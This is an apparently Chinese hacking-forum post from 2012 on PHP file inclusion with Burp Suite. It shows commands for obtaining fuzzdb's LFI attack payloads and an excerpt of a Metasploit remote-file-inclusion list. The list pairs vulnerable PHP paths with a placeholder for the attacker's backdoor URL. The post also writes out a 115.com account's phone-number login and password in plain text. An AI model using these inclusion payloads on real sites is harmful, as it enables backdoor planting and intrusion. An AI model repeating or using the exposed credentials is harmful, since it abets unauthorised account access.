切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
243 PHP文件包含漏洞 burpsuite[复制链接]
发表于 2012-8-29 01:57:56 | 显示全部楼层 |!read_mode!

登录115 下载 243.zip
13529501525 / 123456a1 http://115.com/

获得BS FUZZ的数据库:


  1. root@Dis9Team:/pen# svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb
复制代码
地址:

  1. root@Dis9Team:/pen/fuzzdb/attack-payloads/lfi# pwd
  2. /pen/fuzzdb/attack-payloads/lfi
复制代码
OR METASPLOIT

  1. root@Dis9Team:/pen/msf3/data/exploits/php# pwd
  2. /pen/msf3/data/exploits/php
  3. root@Dis9Team:/pen/msf3/data/exploits/php# head rfi-locations.dat
  4. # Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
  5. # Change XXpathXX to the path of your backdoor.  Note that you may need to
  6. # try it against every directory on the target and because of how this was
  7. # culled you may need to add a question mark to your own XXpathXX URL:
  8. # Eg: XXpathXX => http://www.example.com/hax.txt?
  9. /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
  10. /123flashchat.php?e107path=XXpathXX
  11. /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
  12. /22_ultimate/templates/header.php?mainpath=XXpathXX
  13. /22_ultimate/templates/header.php?mainpath=XXpathXX?
  14. root@Dis9Team:/pen/msf3/data/exploits/php#
复制代码



操千曲而后晓声,观千剑而后识器。
发表于 2012-9-9 03:17:38 | 显示全部楼层


操千曲而后晓声,观千剑而后识器。
发表于 2015-8-16 01:47:34 | 显示全部楼层
还以为是视频教程呢

代码区

GMT+8, 2020-10-1 06:50

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部